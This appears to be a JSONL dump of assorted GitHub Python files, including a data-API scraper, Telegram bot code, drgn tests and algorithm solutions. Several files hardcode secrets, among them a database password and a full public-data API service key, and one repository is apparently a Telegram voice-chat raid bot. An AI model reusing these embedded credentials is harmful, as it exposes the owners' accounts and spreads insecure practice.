maxStudents(self, seats: List[List[str]]) -> int:\n m = len(seats)\n n = len(seats[0])\n valid_seats = [0] * m\n for i in range(m):\n for j in range(n):\n valid_seats[i] |= 1 << j if seats[i][j] == '.' 
else 0\n\n        def count_bit(n):\n            count = 0\n            while n:\n                count += n & 1\n                n >>= 1\n\n            return count\n\n        @lru_cache(None)\n        def func(pre_state, row):\n            if row == m:\n                return 0\n            res = 0\n            for state in range(valid_seats[row] + 1):\n                if state & valid_seats[row] == state and state & (state >> 1) == 0:\n                    if pre_state & (state >> 1) == 0 and (pre_state >> 1) & state == 0:\n                        res = max(res, count_bit(state) + func(state, row + 1))\n            return res\n\n        return func(0, 0)","repo_name":"zihuaweng/leetcode-solutions","sub_path":"leetcode_python/1349.Maximum_Students_Taking_Exam.py","file_name":"1349.Maximum_Students_Taking_Exam.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"}
{"seq_id":"32869347958","text":"# Author: Jon-Paul Boyd\n# Date: 16/01/2018\n# IMAT5118 A.I. Programming - Assignment 2\n#\nimport mysql.connector\nimport logging\nimport coloured_text as ct\nfrom constants import Constants\n\n\nclass Database:\n    \"\"\"Represent the database\"\"\"\n    def __init__(self):\n        self.user = 'imat5118'\n        self.password = 'imat5118password'\n        self.host = '127.0.0.1'\n        self.database = 'sakila'\n        self.connection = mysql.connector.connect(\n            user=self.user,\n            password=self.password,\n            host=self.host,\n            database=self.database)\n        self.cursor = self.connection.cursor()\n        logging.info(\"Database initialised\")\n\n    def execute_query(self, sqlquery):\n        \"\"\"Execute SQL query\"\"\"\n        logging.info(\"Executing query: {}\".format(sqlquery))\n        self.cursor.execute(sqlquery)\n\n    def output_results(self, cursor):\n        row_idx = 0\n        constants = Constants()\n\n        for row in cursor:\n            row_idx += 1\n            col_idx = 0\n            for column in row:\n                if col_idx % 2 == 0:  # Column values in alternating colours to aid readability in shell\n                    print(ct.Fore.YELLOW, end='')\n                    print(column, end='')\n                    print(\" \" + ct.Formatting.RESET_ALL, end='')\n                else:\n                    print(ct.Fore.WHITE, end='')\n                    print(column, end='')\n                    print(\" \" + ct.Formatting.RESET_ALL, end='')\n                col_idx += 1\n\n            print(\"\")  # newline as end of row reached\n\n        if row_idx == 0:\n            print(ct.Fore.MAGENTA + ct.Formatting.BOLD + constants.nothing_found + ct.Formatting.RESET_ALL)\n\n    def cursor_close(self):\n        self.cursor.close()\n\n    def connection_close(self):\n        self.connection.close()\n        logging.info(\"Database connection closed\")\n","repo_name":"corticalstack/NLPPythonToSQL","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
{"seq_id":"7815898459","text":"import pandas as pd\nimport requests\nimport time as tm\nimport csv\nfrom google.cloud import storage\nclient = storage.Client()\nfrom datetime import date\n### Working with GOOGLE\n# Retrieve an existing bucket\n# https://console.cloud.google.com/storage/browser/dejon-data-bucket\nbucket = client.get_bucket('bucket-id')\n# Then do other things...\nblob = bucket.get_blob('remote/path/to/file.txt')\nprint(blob.download_as_bytes())\nblob.upload_from_string('New contents!')\n\n\n###\ntodays_date = date.today()\nyear = todays_date.year\nmonth = todays_date.month\ndef waterMeasuring(year = 2013, month = \"06\"):\n    current_year = year\n    current_month = month\n    pageNo=1\n    numOfRows=1000\n    resultType=\"JSON\"\n    ptNoList=[\"3008A40\", \"2012F50\"]\n    wmyrList=[current_year]\n    wmodList=[current_month]\n    # wmyrList=[\"2012\", \"2013\", \"2014\", \"2015\", \"2016\", \"2017\",\"2018\",\"2019\", \"2020\", \"2021\", \"2022\"]\n    # 
wmodList=[\"01\",\"02\",\"03\", \"04\",\"05\",\"06\",\"07\",\"08\",\"09\",\"10\",\"11\",\"12\"]\n\n #### Parameters Values\n Payload = {\n \"serviceKey\" : \"/S1CuHzopeMWDtsc2q26Ezp5Vgpgf2XGBYzYZehUCBgBQpHaZ+GvLIbar8Q+MT7zAliK60Rzoj9kEDMZlIhI4Q==\",\n \"pageNo\" : pageNo,\n \"numOfRows\" : numOfRows,\n \"resultType\" : resultType,\n \"ptNoList\" : ptNoList,\n \"wmyrList\": wmyrList ,\n \"wmodList\" : wmodList\n }\n\n base_url = \"http://apis.data.go.kr/1480523/WaterQualityService\"\n # function = \"/getRealTimeWaterQualityList\"\n function = \"/getWaterMeasuringList\"\n get_url = base_url + function\n\n\n def access_api(function, params):\n print(\"Getting results...\")\n target = base_url + function\n r = requests.get(target, params).json()\n tm.sleep(2)\n res = r['getWaterMeasuringList']\n return res['item']\n\n\n for item in range(0, len(ptNoList)):\n for i in range(0, len(wmyrList)):\n for j in range(0, len(wmodList)):\n print(\"TARGET: \", ptNoList[item], \"YEAR: = \", wmyrList[i], \"MONTH: \", wmodList[j])\n data_file = open(\"WaterMeasuringList.csv\", 'a')\n Payload = {\n \"serviceKey\": \"/S1CuHzopeMWDtsc2q26Ezp5Vgpgf2XGBYzYZehUCBgBQpHaZ+GvLIbar8Q+MT7zAliK60Rzoj9kEDMZlIhI4Q==\",\n \"pageNo\": pageNo,\n \"numOfRows\": numOfRows,\n \"resultType\": resultType,\n \"ptNoList\": ptNoList[item],\n \"wmyrList\": wmyrList[i],\n \"wmodList\": wmodList[j]\n }\n # API ACCESS FUNCTIONS ###\n\n data = access_api(function, params=Payload)\n\n csv_writer = csv.writer(data_file)\n count = 0\n\n for row in data:\n if count == 0:\n # header = row.keys()\n # csv_writer.writerow(header)\n count += 1\n csv_writer.writerow(row.values())\n\n data_file.close()\n ### Main program\n return \"Done\"\n\n\nwaterMeasuring()\n","repo_name":"BatbayarEnkhbaatar/airflow_dags","sub_path":"dags/getWaterMeasuringList.py","file_name":"getWaterMeasuringList.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28122275222","text":"import numpy as np\r\nimport re\r\n\r\n#加载词典\r\ndef loadDic( infile ):\r\n input_file = open(infile, mode='r',encoding='utf-8')\r\n\r\n infile_content = input_file.readlines()\r\n list_word = []\r\n for each in infile_content:\r\n list_temp = each.split('\\uf8f5')\r\n word = list_temp[0]\r\n meaning = ''\r\n for i in range(1,len(list_temp)-1):\r\n meaning += ' ' + list_temp[i]\r\n list_word.append([word,meaning])\r\n #print(list_word)\r\n dict_temp = dict(list_word)\r\n #print(dict_temp)\r\n input_file.close()\r\n return dict_temp\r\n\r\n#词型还原\r\ndef trans( word:str ):\r\n re1 = re.compile(r'(\\w+)s(\\W)*',flags=re.I) #none transfrom\r\n re2 = re.compile(r'(\\w+)es(\\W)*',flags=re.I)\r\n re3 = re.compile(r'(\\w+)ies(\\W)*',flags=re.I)\r\n re4 = re.compile(r'(\\w+)ves(\\W)*',flags=re.I)\r\n\r\n re5 = re.compile(r'(\\w+)ies',flags=re.I)#verb\r\n re6 = re.compile(r'(\\w+)es',flags=re.I)\r\n re7 = re.compile(r'(\\w+)s', flags=re.I)\r\n re8 = re.compile(r'(\\w+)'+word[len(word)-4]+'{2}ing(\\W)*',flags=re.I)#结尾双写加ing\r\n re9 = re.compile(r'(\\w+)ying(\\W)*',flags=re.I)\r\n re10 = re.compile(r'(\\w+)ing(\\W)*', flags=re.I)\r\n re11 = re.compile(r'(\\w+)'+word[len(word)-4]+'{2}ed(\\W)*',flags=re.I)\r\n re12 = re.compile(r'(\\w+)ied(\\W)*',flags=re.I)\r\n re13 = re.compile('(\\w+)ed(\\W)*',flags=re.I)\r\n res = []\r\n if re.search(re3,word):\r\n res.append(re.sub(r'ies',r'y',word))\r\n elif re.search(re4,word):\r\n res.append(re.sub(r'ves',r'f',word))\r\n res.append(re.sub(r'ves',r'fe', word))\r\n elif 
re.search(re2,word):\r\n res.append(re.sub(r'es',r'',word))\r\n res.append(re.sub(r'es',r'e',word))\r\n elif re.search(re1,word):\r\n res.append(re.sub(r's',r'',word))\r\n '''\r\n if re.search(re5,word):\r\n res.append(re.sub(r'ies',r'y',word))\r\n elif re.search(re6,word):\r\n res.append(re.sub(r'es',r'',word))\r\n elif re.search(re7,word):\r\n res.append(re.sub(r's',r'',word))\r\n '''\r\n elif re.search(re8,word):\r\n res.append(re.sub(r''+word[len(word) - 4] + '{2}ing', r''+word[len(word) - 4],word))\r\n elif re.search(re9,word):\r\n res.append(re.sub(r'ying',r'ie',word))\r\n elif re.search(re10,word):\r\n res.append(re.sub(r'ing',r'',word))\r\n res.append(re.sub(r'ing',r'e',word))\r\n elif re.search(re11, word):\r\n res.append(re.sub(r''+word[len(word) - 4] + '{2}ed', r''+word[len(word) - 4],word))\r\n elif re.search(re12, word):\r\n res.append(re.sub(r'ied',r'y',word))\r\n elif re.search(re13, word):\r\n res.append(re.sub(r'ed',r'',word))\r\n res.append(re.sub(r'ed',r'e',word))\r\n return res\r\n\r\n#没有匹配的词语\r\ndef NoMatch( outfile, word ):\r\n file_handle = open(outfile, 'a', encoding='utf-8')\r\n file_handle.write(word + '\\n')\r\n\r\n#不规则的词语\r\ndef irregular( ir_file , word:str ):\r\n input_file = open( ir_file, mode='r', encoding='utf-8')\r\n infile_content = input_file.readlines()\r\n for each in infile_content:\r\n list_word = each.split('\\t')\r\n for i in range( len(list_word) ):\r\n if list_word[i].strip() == word:\r\n return list_word[0]\r\n return 'no match'\r\n\r\n\r\nif __name__ == \"__main__\":\r\n '''\r\n b = \"book\"\r\n a = \"lifes\"\r\n c = \"shopping\"\r\n d = \"cooked\"\r\n print( trans(a) )\r\n print( trans(b) )\r\n print(trans(c))\r\n print(trans(d))\r\n '''\r\n # print (irregular('C:\\\\Users\\\\zhc\\\\Documents\\\\nlp\\\\dic_ec\\\\irregular.txt','dug'))\r\n dict = loadDic('C:\\\\Users\\\\zhc\\\\Documents\\\\nlp\\\\dic_ec\\\\dic_ec.txt')\r\n while( True ):\r\n word = input('请输入要查询的单词:')\r\n if word == 'q':\r\n print('查询结束,欢迎使用')\r\n break\r\n ifMatch = False\r\n if word in dict.keys():\r\n ifMatch = True\r\n print(word,dict[word])\r\n word_list = trans(word)\r\n if word_list!= []:\r\n for i in range(len(word_list)):\r\n word_temp = word_list[i]\r\n if word_temp in dict.keys():\r\n ifMatch = True\r\n print(word_temp, dict[word_temp])\r\n word_ir = irregular('C:\\\\Users\\\\zhc\\\\Documents\\\\nlp\\\\dic_ec\\\\irregular.txt',word)\r\n if word_ir != 'no match' and word_ir in dict.keys():\r\n print(word_ir,dict[word_ir])\r\n ifMatch = True\r\n if ifMatch == False:\r\n print('输入的单词不存在,已加入NoMatchList.txt!')\r\n NoMatch('C:\\\\Users\\\\zhc\\\\Documents\\\\nlp\\\\dic_ec\\\\NoMatchList.txt',word)\r\n","repo_name":"abbycc/course","sub_path":"nlp/zhc_Lemmatization.py","file_name":"zhc_Lemmatization.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"10951367689","text":"import os\nimport os.path\nimport subprocess\nimport tempfile\nimport unittest\n\nfrom drgn import Program\nfrom tests import TestCase\n\n\nclass TestLive(TestCase):\n @classmethod\n def setUpClass(cls):\n cls.prog = Program()\n cls.prog.set_pid(os.getpid())\n\n def test_threads(self):\n tids = [thread.tid for thread in self.prog.threads()]\n self.assertIn(os.getpid(), tids)\n for tid in tids:\n self.assertEqual(self.prog.thread(tid).tid, tid)\n\n def test_thread_not_found(self):\n self.assertRaises(LookupError, self.prog.thread, 1)\n\n def test_main_thread(self):\n 
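# for a live process, drgn reports the main thread's TID as the process PID\n        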
self.assertEqual(self.prog.main_thread().tid, os.getpid())\n\n    def test_crashed_thread(self):\n        self.assertRaisesRegex(\n            ValueError,\n            \"crashed thread is only defined for core dumps\",\n            self.prog.crashed_thread,\n        )\n\n\nclass TestCoreDump(TestCase):\n    TIDS = (\n        2265413,\n        2265414,\n        2265415,\n        2265416,\n        2265417,\n        2265418,\n        2265419,\n        2265420,\n        2265421,\n        2265422,\n        2265423,\n        2265424,\n        2265425,\n    )\n\n    MAIN_TID = 2265413\n    CRASHED_TID = 2265419\n\n    @classmethod\n    def setUpClass(cls):\n        super().setUpClass()\n        with tempfile.NamedTemporaryFile() as core_dump_file:\n            try:\n                subprocess.check_call(\n                    [\n                        \"zstd\",\n                        \"--quiet\",\n                        \"--force\",\n                        \"--decompress\",\n                        \"--stdout\",\n                        os.path.join(os.path.dirname(__file__), \"sample.coredump.zst\"),\n                    ],\n                    stdout=core_dump_file,\n                )\n            except FileNotFoundError:\n                raise unittest.SkipTest(\"zstd not found\")\n            cls.prog = Program()\n            cls.prog.set_core_dump(core_dump_file.name)\n\n    def test_threads(self):\n        self.assertSequenceEqual(\n            sorted(thread.tid for thread in self.prog.threads()),\n            self.TIDS,\n        )\n\n    def test_thread(self):\n        for tid in self.TIDS:\n            self.assertEqual(self.prog.thread(tid).tid, tid)\n\n    def test_thread_not_found(self):\n        self.assertRaises(LookupError, self.prog.thread, 99)\n\n    def test_main_thread(self):\n        self.assertEqual(self.prog.main_thread().tid, self.MAIN_TID)\n\n    def test_crashed_thread(self):\n        self.assertEqual(self.prog.crashed_thread().tid, self.CRASHED_TID)\n","repo_name":"osandov/drgn","sub_path":"tests/test_thread.py","file_name":"test_thread.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":1531,"dataset":"github-code","pt":"47"}
{"seq_id":"17766377846","text":"# ArrayCore - © Noob \n\nimport asyncio\nimport os\nimport sys\nimport time\n\nfrom dotenv import load_dotenv\nfrom pyrogram import Client, filters\nfrom pytgcalls import PyTgCalls\n\n\nif os.path.exists(\".env\"):\n    load_dotenv(\".env\")\n    \n__version__ = \"v0.0.1\"\n\n# -------------CONFIGS--------------------\nAPI_ID = int(os.getenv(\"API_ID\", \"\"))\nAPI_HASH = os.getenv(\"API_HASH\", \"\")\nALIVE_PIC = os.getenv(\"ALIVE_PIC\", \"\")\nBOT_TOKEN = os.getenv(\"BOT_TOKEN\", None)\nSESSION = os.getenv(\"SESSION\", None)\nGROUP_MODE = os.getenv(\"GROUP_MODE\", \"True\")\nSTART_VID = os.getenv(\"START_VID\", None)\nHNDLR = os.getenv(\"HNDLR\", \".\")  # command prefix; \".\" is an assumed default, required by hl below\n\n\ndef make_int(str_input):\n    str_list = str_input.split(\" \")\n    int_list = []\n    for x in str_list:\n        int_list.append(int(x))\n    return int_list\n\n\nsudo = os.getenv(\"SUDO_USERS\")\nSUDO_USERS = []\nif sudo:\n    SUDO_USERS = make_int(sudo)\nDEVS = [5195361852, 5166466565]\nfor x in DEVS:\n    SUDO_USERS.append(x)\n\n\n# SUDO_USERS = list(filter(lambda x: x, map(int, os.getenv(\"SUDO_USERS\", \"5195361852 5166466565 \").split())))\n#----------------------------------------------\n\nvcbot = Client(\n    'ArrayCore',\n    api_id=API_ID,\n    api_hash=API_HASH,\n    bot_token=BOT_TOKEN,\n    plugins={'root': 'ArrayCore.Plugin'},\n)\n\nHELP_DICT = dict()\nhl = HNDLR[0]\nstart_time = time.time()\n\n\nif GROUP_MODE in (\"True\", \"true\", \"TRUE\"):\n    grp = True\nelse:\n    grp = False\n\n\n#-------------------------CLIENTS-----------------------------\nif SESSION:\n    Venom = Client(SESSION, api_id=API_ID, api_hash=API_HASH, plugins={'root': 'ArrayCore.vc'})\n    call_py = PyTgCalls(Venom)\nelse:\n    Venom = None\n    call_py = 
None\n","repo_name":"Mass-Action/vc-raid","sub_path":"ArrayCore/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"4713246925","text":"import logging\nimport ConfigParser\nfrom database import Sensor\n\n__author__ = 'Jan Hajnar'\n__date__ = '19.7.2014'\n__license__ = 'GPL'\n\nlogger = logging.getLogger(__name__)\n\n\nclass AppConfig(object):\n def __init__(self):\n self.port = None\n self.temp_sensors = {}\n self.check_period = None\n\n def load_config(self, path):\n config_parser = ConfigParser.RawConfigParser()\n config_parser.read(path)\n try:\n self.port = config_parser.getint(\"webapp\", \"port\")\n temp_sensors = config_parser.get(\"sensors\", \"temp_sensors\")\n for temp_sensor in temp_sensors.split(\"\\n\"):\n sensor_parameters = temp_sensor.split(\",\")\n self.temp_sensors[sensor_parameters[0]] = Sensor(sensor_parameters[0],\n sensor_parameters[1], sensor_parameters[2])\n self.check_period = config_parser.getint(\"sensors\", \"check_period_mins\")\n except ConfigParser.Error:\n logger.exception(\"Error occurred during parsing of configuration file\")\n","repo_name":"DzonyKalafut/raspberry-temp","sub_path":"app_config.py","file_name":"app_config.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40844433917","text":"import unittest\n\nfrom kafka.errors import (\n KafkaError,\n)\n\nfrom minos.common import (\n Config,\n)\nfrom minos.plugins.kafka import (\n KafkaBrokerBuilderMixin,\n KafkaCircuitBreakerMixin,\n)\nfrom tests.utils import (\n CONFIG_FILE_PATH,\n)\n\n\nclass TestKafkaCircuitBreakerMixin(unittest.IsolatedAsyncioTestCase):\n def test_constructor(self):\n mixin = KafkaCircuitBreakerMixin()\n self.assertEqual((KafkaError,), mixin.circuit_breaker_exceptions)\n\n\nclass TestKafkaBrokerBuilderMixin(unittest.IsolatedAsyncioTestCase):\n def test_constructor(self):\n mixin = KafkaBrokerBuilderMixin()\n\n config = Config(CONFIG_FILE_PATH)\n mixin.with_config(config)\n\n common_config = config.get_interface_by_name(\"broker\")[\"common\"]\n\n expected = {\n \"group_id\": config.get_name(),\n \"host\": common_config[\"host\"],\n \"port\": common_config[\"port\"],\n }\n self.assertEqual(expected, mixin.kwargs)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"minos-framework/minos-python","sub_path":"packages/plugins/minos-broker-kafka/tests/test_kafka/test_common.py","file_name":"test_common.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":433,"dataset":"github-code","pt":"47"} +{"seq_id":"17558841738","text":"from pyjamas_core import Supermodel\nfrom pyjamas_core.util import Input, Output, Property\nfrom geopy.distance import geodesic\nimport numpy as np\n\n# define the model class and inherit from class \"Supermodel\"\nclass Model(Supermodel):\n # model constructor\n def __init__(self, model_id, name: str):\n # instantiate supermodel\n super(Model, self).__init__(model_id, name)\n\n # define inputs\n self.inputs['KWData'] = Input(name='Power Plant', unit='-', info='European Power Plant')\n self.inputs['Locations'] = Input(name='Locations', unit='-', info='Locations with geographical coordinates')\n\n # define outputs\n self.outputs['DistanceFactor'] = Output(name='DistanceFactor', unit='[€/km*MWh]', info='Distance factor')\n\n # define properties\n 
self.properties['NetworkCost'] = Property(default=148E9, data_type=float, name='Network cost', unit='€',\n info=\"Network cost * annual amount of energy\", example='148*10^9 € (Mittelspannung, Churwalden 2017)')\n\n # define persistent variables\n self.NetworkCost = None\n\n async def func_amend(self, keys=[]):\n if 'NetworkCost' in keys:\n self.NetworkCost = self.get_property('NetworkCost')\n\n async def func_peri(self, prep_to_peri=None):\n # inputs\n KW_data = await self.get_input('KWData')\n locations = await self.get_input('Locations')\n\n # calculate distance factor\n DistanceFactor = {'location': {}, 'dist_factor': {}}\n dist_factor = []\n\n # - loop over locations\n for it in range(0, len(locations['dist_networks'])):\n loc_lat_i = locations['Latitude'][it]\n loc_long_i = locations['Longitude'][it]\n\n # distance in meter between location of SPG and KW\n dist_KW = [geodesic((loc_lat_i, loc_long_i), (KW_data['lat'][jt], KW_data['long'][jt])).m for jt in range(0, len(KW_data['id']))]\n\n # distance times power of KW\n dist_power = np.array(dist_KW) * np.array(KW_data['p_inst'])\n dist_power_sum = np.sum(dist_power)\n # - annual (assume 8760 h = 1 year)\n dist_power_sum = dist_power_sum*8760\n\n # distance factor\n dist_factor_i = self.NetworkCost/dist_power_sum # €/(m*W)\n # - change unit from €/(m*W) to €/(km*MWh)\n dist_factor_i = dist_factor_i*1E9\n # append in list\n dist_factor.append(dist_factor_i)\n\n\n # set output\n DistanceFactor['location'] = locations['dist_networks']\n DistanceFactor['dist_factor'] = dist_factor\n self.set_output(\"DistanceFactor\", DistanceFactor)\n","repo_name":"schmocker/Pyjamas","sub_path":"Models/ExpensesCalculations/DistanceFactor/V001/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"29936454325","text":"import handlers.refill\n\nfrom aiogram import Dispatcher, types\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters.state import StatesGroup, State\nfrom aiogram.utils.exceptions import MessageToDeleteNotFound\n\nfrom database import users, thedex_db\nfrom demo import dm_inline, dm_database\nfrom handlers.refill_500 import smalluser_check\nfrom keyboards import inline\nfrom binance import thedex\n\n\nclass DemoStabPoolUser(StatesGroup):\n hold = State()\n amount = State()\n currency = State()\n finish = State()\n\n\nasync def registration_500(call: types.CallbackQuery):\n rows = await thedex_db.get_transaction(call.from_user.id)\n language = await users.user_data(call.from_user.id)\n await dm_database.get_balance_stabpool(call.from_user.id)\n sum_refill = 0\n try:\n await call.message.delete()\n except MessageToDeleteNotFound:\n pass\n if not rows:\n if sum_refill >= 20000:\n text = await users.get_text(\"Стабпул ошибка #1\", language[4])\n await call.answer(text, show_alert=True)\n await handlers.refill.handle_deposit_funds(call)\n else:\n text = await users.get_text(\"Стабпул пополнение\", language[4])\n text = text.replace('{сумма}', f'{20000 - sum_refill}')\n dep_msg = await call.message.answer(text, reply_markup=dm_inline.back_menu(language[4]))\n await DemoStabPoolUser.amount.set()\n state = Dispatcher.get_current().current_state()\n await state.update_data({\"dep_msg\": dep_msg.message_id})\n if len(rows) == 1:\n row = rows[0]\n await smalluser_check(call, row)\n if len(rows) > 1:\n text = await users.get_text(\"Ошибка пополнения #5\", language[4])\n await 
call.message.answer(text)\n\n\nasync def back_menu(call: types.CallbackQuery, state: FSMContext):\n await state.finish()\n language = await users.user_data(call.from_user.id)\n text = 'Выберите один из вариантов:'\n if language[4] == \"EN\":\n text = 'Select at least one option:'\n await call.message.delete()\n await call.message.answer(text, reply_markup=dm_inline.dm_refill_account_2(language[4]))\n\n\nasync def smalluser_step1(msg: types.Message, state: FSMContext):\n async with state.proxy() as data:\n try:\n await msg.bot.delete_message(chat_id=msg.from_id,\n message_id=data.get('dep_msg'))\n await msg.delete()\n except MessageToDeleteNotFound:\n pass\n language = await users.user_data(msg.from_user.id)\n sum_refill = 0\n if msg.text.isdigit():\n if 1000 <= int(msg.text) <= (20000 - sum_refill):\n summary = int(msg.text)\n response = await thedex.create_invoice(summary, msg.from_id, \"[DEMO] Стабилизационный пул\")\n await state.update_data({'status': 500, 'amount': int(msg.text), 'invoiceId': response})\n text = await users.get_text(\"Выбор сети пополнения\", language[4])\n await msg.answer(text, reply_markup=inline.return_currencies())\n await DemoStabPoolUser.next()\n elif int(msg.text) > 20000:\n text = await users.get_text(\"Стабпул ошибка #2\", language[4])\n text = text.replace('{сумма}', f'{20000 - sum_refill}')\n dep_msg = await msg.answer(text)\n await state.update_data({\"dep_msg\": dep_msg.message_id})\n elif int(msg.text) < 1000:\n text = await users.get_text(\"Стабпул ошибка #3\", language[4])\n dep_msg = await msg.answer(text)\n await state.update_data({\"dep_msg\": dep_msg.message_id})\n else:\n text = await users.get_text(\"Ошибка пополнения #3\", language[4])\n await msg.answer(text)\n\n\nasync def smalluser_step2(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n async with state.proxy() as data:\n data['currency'] = call.data\n crypto_dict = {\n 'BTC_BITCOIN': 'Bitcoin',\n 'ETH_ETHEREUM': 'Ethereum',\n 'USDT_TRON': 'USDT TRC20',\n 'USDT_ETHEREUM': 'USDT ERC20',\n 'TRX_TRON': 'Tron',\n 'LTC_LITECOIN': 'Litecoin',\n 'BNB_BSC': 'Binance Coin',\n 'BUSD_BSC': 'Binance USD'\n }\n currency_str = crypto_dict[data.get('currency')]\n language = await users.user_data(call.from_user.id)\n wallet = await thedex.pay_invoice(data.get('currency'), data.get('invoiceId'))\n count = wallet[1]\n if \".\" in count:\n count = count.replace(\".\", \",\")\n text = f\"Отправьте `{count}` {currency_str} на указанный адрес:\\n\\n`{wallet[0]}`\\n\\n\" \\\n f\"Перед совершением транзакции внимательно проверьте адрес получателя и сумму перевода, оба значения \" \\\n f\"должны совпадать со значениями в сообщении\" \\\n f\"\\n\\n*Срок действия кошелька для пополнения \\- 60 минут, \" \\\n f\"если вы не успеваете пополнить за это время отмените транзакцию\\!*\"\n if language[4] == \"EN\":\n text = f\"Please send {count} {currency_str} to the provided address:\\n\\n{wallet[0]}\\n\\n\" \\\n f\"Before making the transaction, carefully verify the recipient's address and the transfer amount.\" \\\n f\" Both values should match the ones in the message.\"\n await call.message.answer(text, reply_markup=inline.finish_transaction(language[4]),\n parse_mode=types.ParseMode.MARKDOWN_V2)\n await DemoStabPoolUser.next()\n\n\nasync def smalluser_finish(call: types.CallbackQuery, state: FSMContext):\n language = await users.user_data(call.from_user.id)\n await call.message.delete()\n async with state.proxy() as data:\n text = await users.get_text(\"Статус Successful (thedex)\", 
language[4])\n await dm_database.insert_deposit(call.from_user.id, data.get(\"amount\"))\n await dm_database.insert_demo_balance_history(\n call.from_user.id, data.get(\"amount\"), \"IN\", data.get('invoiceId'))\n await state.finish()\n await call.message.answer(text, reply_markup=await dm_inline.dm_main_menu(language[4]))\n\n\ndef register(dp: Dispatcher):\n dp.register_callback_query_handler(registration_500, text='dm_stabpool')\n dp.register_message_handler(smalluser_step1, state=DemoStabPoolUser.amount)\n dp.register_callback_query_handler(back_menu, state=DemoStabPoolUser.amount)\n dp.register_callback_query_handler(smalluser_step2, state=DemoStabPoolUser.currency)\n dp.register_callback_query_handler(smalluser_finish, state=DemoStabPoolUser.finish)\n","repo_name":"west3n/j2mbot","sub_path":"demo/dm_refill_stabpool.py","file_name":"dm_refill_stabpool.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"36075704066","text":"from tensorflow.python.keras.models import load_model\nimport numpy as np\nimport os\nfrom tensorflow.python.keras.preprocessing import image\n\nimport constants as constant\nimport utils\n\n\nclass StaticTestModel:\n def __init__(self, model_filename):\n self.model_filename = model_filename\n self.classifier = load_model(constant.MODEL_METRICS_DIRECTORY + model_filename)\n\n def predict(self, image_path):\n test_image = image.load_img(image_path, grayscale=True)\n test_image = image.img_to_array(test_image)\n test_image = np.expand_dims(test_image, axis=0)\n result = self.classifier.predict(test_image)\n current_result = utils.get_letter_based_on_prediction(result)\n return utils.get_correct_character_for_special_characters(current_result)\n\n def test_model_with_alphabet(self, images_format='.JPG'):\n global_correct_classification_count = 0\n global_total_examples_count = 0\n for subdir, dirs, files in os.walk(constant.TEST_DATA_DIRECTORY):\n split_list = subdir.split('TestData/')\n actual_letter = split_list[1]\n print(actual_letter)\n correct_classification_count = 0\n total_examples_count = 0\n\n if files:\n for file in files:\n image_path = os.path.join(subdir, file)\n predicted_letter = self.predict(image_path)\n total_examples_count += 1\n\n if actual_letter == predicted_letter:\n correct_classification_count += 1\n\n print('Correctly classified: ' + str(correct_classification_count))\n acc = correct_classification_count / total_examples_count\n global_correct_classification_count += correct_classification_count\n global_total_examples_count += total_examples_count\n print('Accuracy: ' + str(acc))\n\n print('Global correctly classified: ' + str(global_correct_classification_count) + \"/\" + str(\n global_total_examples_count))\n global_acc = global_correct_classification_count / global_total_examples_count\n print('Global accuracy: ' + str(global_acc))\n\n\n# test_model_A = StaticTestModel('model_saved_2019-06-18.h5')\ntest_model = StaticTestModel('model_saved_2019-06-20.h5')\ntest_model.test_model_with_alphabet()\n","repo_name":"Deeathex/RealTimeSignLanguageRecognition","sub_path":"static_test_model.py","file_name":"static_test_model.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70272960142","text":"# -*- coding: utf-8 -*-\n\n'''\nhacker cup C問題\nメモ化再帰\n\nCreated on 2012/01/29\n\n@author: y42sora\n'''\n \ndef check(string):\n global dic\n global 
max_num\n    \n    if string in dic:\n        return dic[string]\n    \n    if len(string) == 0:\n        return 1\n\n    if string[0] == '0':\n        return 0\n    \n    if int(string) <= max_num:\n        return 1\n    else:\n        return 0\n\nfile = open('in.txt', 'r')\nt = int(file.readline())\n\nout = open('out.txt', 'w')\n\nfor x in range(t):\n    line = file.readline()\n    s = line.split(\" \")\n    max_num = int(s[0])\n    \n    if len(s) == 1:\n        s = file.readline().rstrip()\n    else:\n        s = s[1].rstrip()\n    \n    ans = 1\n    \n    for string in s.split(\" \"):\n        dic = dict([])\n        dic[''] = 1\n        \n        dic[string[0:1]] = check(string[0:1])\n        dic[string[1:2]] = check(string[1:2])\n        dic[string[0:2]] = check(string[0:2]) + dic[string[0:1]] * dic[string[1:2]]\n        \n        for i in range(3, len(string)+1):\n            num = 0\n            num += dic[string[0:i-1]] * check(string[i-1:i])\n            num += dic[string[0:i-2]] * check(string[i-2:i])\n            num += dic[string[0:i-3]] * check(string[i-3:i])\n            dic[string[0:i]] = num\n        \n        ans *= dic[string]\n    \n    out.write(\"Case #%d: %d\\n\" % ((x+1),ans))\n    \nout.close()\n","repo_name":"y42sora/soraSource","sub_path":"Algorithm/Facebook Hacker Cup/2012/Round 1/Squished Status.py","file_name":"Squished Status.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
